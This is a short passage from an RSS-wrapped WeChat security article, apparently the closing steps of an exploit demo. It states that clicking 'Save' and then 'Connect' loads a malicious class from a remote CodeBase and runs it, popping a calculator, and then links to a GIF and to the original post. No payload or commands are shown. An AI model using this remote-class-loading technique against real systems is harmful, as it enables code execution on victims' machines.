disc;"><li><p>点击&#34;Save&#34;保存，然后<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">点击</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">&#34;Connect</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">&#34;，会加载远程CodeBase的</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">恶意类并执行，</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">计算器弹出。</span></p></li></ul><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><br/></span></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>最终演示如下：</p></li></ul><p><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.4512325830653805" data-s="300,640" style="" data-type="gif" data-w="1866" src="https://wechat2rss.xlab.app/img-proxy/?k=7fea4b4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FEFsbR7ibibnA0HicxYpnbGf0ajiaJ1Lwk6PAqVw66Ou2dlclcPtWGsOxCvu4haPCJvaqCemCXyZAbWicXbcwLvqvmBA%2F640%3Fwx_fmt%3Dgif"/></p><p><br/></p>



<p><a href="2247483658">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f8f017a8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2NTM1MjQ3OA%3D%3D%26mid%3D2247483658%26idx%3D1%26sn%3D584710da0fbe56c1246755147bcec48e%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2020 14:39:00 +0800</pubDate>
    </item>
  </channel>
</rss>